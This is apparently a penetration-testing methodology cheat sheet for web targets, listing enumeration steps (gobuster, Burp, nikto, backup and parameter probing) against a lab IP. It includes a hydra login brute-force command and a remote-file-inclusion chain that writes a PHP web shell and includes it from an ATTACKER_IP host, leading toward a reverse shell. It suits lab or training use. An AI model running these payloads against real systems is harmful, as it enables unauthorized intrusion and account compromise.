Web Path
Methodology summary
Launch general-purpose scanners (gobuster, dirsearch, etc.).
While the scans run, look at the page source, network connections, cookies, robots.txt, the sitemap, 404/403 error pages, and run an SSL/TLS scan.
Start spidering with Burp Suite.
When you identify a directory, brute-force inside it too
Backup checking: test whether you can find backups of discovered files by appending common backup extensions (.bak, .old, ~).
Brute-force parameters: try to find hidden parameters.
Once you have identified every endpoint that accepts user input, check each one for all the vulnerability classes that apply to it.
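The backup-checking step above can be sketched as a small loop. The target URL and the extension list here are assumptions (a real run would use a fuller list and the files your scans actually found); the `curl` line is left commented so the sketch runs offline:

```shell
# Probe for backups of a discovered file by appending common backup
# extensions. URL and extensions are illustrative assumptions.
base='http://10.11.1.16/config.php'
for ext in .bak .old .orig .save '~' .swp; do
  echo "checking ${base}${ext}"
  # curl -s -o /dev/null -w '%{http_code}\n' "${base}${ext}"
done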
Basic Enumeration
Find the index page
Check Wappalyzer to see what the page was built with
Identify the version of the web server that is running
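One quick way to get the web server version is the Server response header. Against a live target you would run `curl -sI http://10.11.1.16/ | grep -i '^Server:'`; the snippet below demonstrates the same parsing step on a canned response (the Apache banner is made up for illustration):

```shell
# Extract the Server banner from a canned HTTP response header.
# On a real engagement, pipe `curl -sI <target>` into the same grep.
printf 'HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n' | grep -i '^Server:'
```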
Paths
Enumerate the URL paths to map the site and see if anything is hidden
Check robots.txt
See if PHP files take parameters, e.g. 10.11.1.16/administrator/alerts/alertConfigField.php?urlConfig=
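Hidden parameters on an endpoint like the one above can be brute-forced. The parameter names below are a tiny illustrative sample (a tool such as ffuf with a real wordlist, e.g. `ffuf -u "${url}?FUZZ=test" -w params.txt -fs 0`, does this at scale); the loop just builds the candidate URLs:

```shell
# Build candidate URLs for hidden-parameter brute forcing.
# Endpoint is from the notes; the parameter wordlist is an assumption.
url='http://10.11.1.16/administrator/alerts/alertConfigField.php'
for param in urlConfig file page include path; do
  echo "${url}?${param}=test"
done
```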
Is there a login form?
If it's phpMyAdmin or another known application, try default creds
Try basic SQLi
Is the content user-generated?
Is there a username?
If so, use hydra to brute-force the login
Try basic SQLi
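A hydra login brute-force against a POST form can be sketched as below. The login path, field names, and failure string are assumptions — pull the real ones from the request captured in Burp. The command is echoed rather than executed so the sketch is safe to run anywhere:

```shell
# Assemble a hydra http-post-form invocation for a discovered login.
# Path, field names, and the 'Invalid' failure marker are hypothetical.
target='10.11.1.16'
form='/administrator/index.php:username=^USER^&passwd=^PASS^:Invalid'
echo hydra -l admin -P /usr/share/wordlists/rockyou.txt "$target" http-post-form "$form"
```

Drop the `echo` to actually launch the attack once the form specification matches what you saw in the intercepted request.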
Vulnerabilities
Run nikto
Search Exploit-DB for vulnerabilities in the CMS or application that is running, as well as in the core version of the web server
Can you get RFI?
Can you now get RCE via RFI?
Can you now get a true callback (e.g. a reverse shell)?
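The RFI-to-RCE chain above can be sketched as follows, reusing the hypothetical urlConfig parameter from the Paths section; ATTACKER_IP is a placeholder. The payload is served with a .txt extension so your own server delivers it raw instead of executing it:

```shell
# Sketch: escalate RFI to RCE via a remotely-included PHP payload.
# 1. Write the payload and serve it from the attacking machine:
echo '<?php system($_GET["cmd"]); ?>' > shell.txt
# python3 -m http.server 80
# 2. Make the target include and execute it (endpoint/parameter assumed):
# curl 'http://10.11.1.16/administrator/alerts/alertConfigField.php?urlConfig=http://ATTACKER_IP/shell.txt&cmd=id'
```

If `cmd=id` comes back with command output, move on to a full reverse-shell callback.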